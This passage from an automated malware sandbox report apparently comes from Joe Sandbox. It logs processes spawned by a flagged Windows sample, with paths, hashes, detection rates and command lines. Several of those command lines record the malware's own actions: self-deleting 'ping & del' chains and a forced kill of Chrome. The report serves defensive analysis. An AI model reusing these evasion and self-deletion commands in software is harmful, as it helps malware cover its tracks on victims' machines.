                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:4453376 bytes
                                                                                                                                                                        MD5 hash:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        • Detection: 35%, Metadefender, Browse
                                                                                                                                                                        • Detection: 83%, ReversingLabs
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Analysis Process: 63C4F3D9EA0CC861.exe PID: 6004 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:18
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:4453376 bytes
                                                                                                                                                                        MD5 hash:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Analysis Process: cmd.exe PID: 5776 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: conhost.exe PID: 1968 Parent PID: 5776

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: PING.EXE PID: 5748 Parent PID: 5776

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xd00000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        Analysis Process: 1612045890161.exe PID: 5440 Parent PID: 3664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:30
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:103632 bytes
                                                                                                                                                                        MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                        • Detection: 14%, ReversingLabs
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        Analysis Process: cmd.exe PID: 1240 Parent PID: 6004

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:31
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        Imagebase:0x910000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: conhost.exe PID: 3924 Parent PID: 1240

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:32
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: taskkill.exe PID: 6164 Parent PID: 1240

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:32
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                        File size:74752 bytes
                                                                                                                                                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        Analysis Process: cmd.exe PID: 6328 Parent PID: 6004

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:37
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: conhost.exe PID: 6336 Parent PID: 6328

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:37
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Analysis Process: PING.EXE PID: 6372 Parent PID: 6328

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:38
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Analysis Process: ThunderFW.exe PID: 3148 Parent PID: 3664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:11
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                        File size:73160 bytes
                                                                                                                                                                        MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                        • Detection: 2%, ReversingLabs

                                                                                                                                                                        Analysis Process: cmd.exe PID: 412 Parent PID: 3664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Analysis Process: conhost.exe PID: 5752 Parent PID: 412

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Analysis Process: PING.EXE PID: 6268 Parent PID: 412

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Reset < >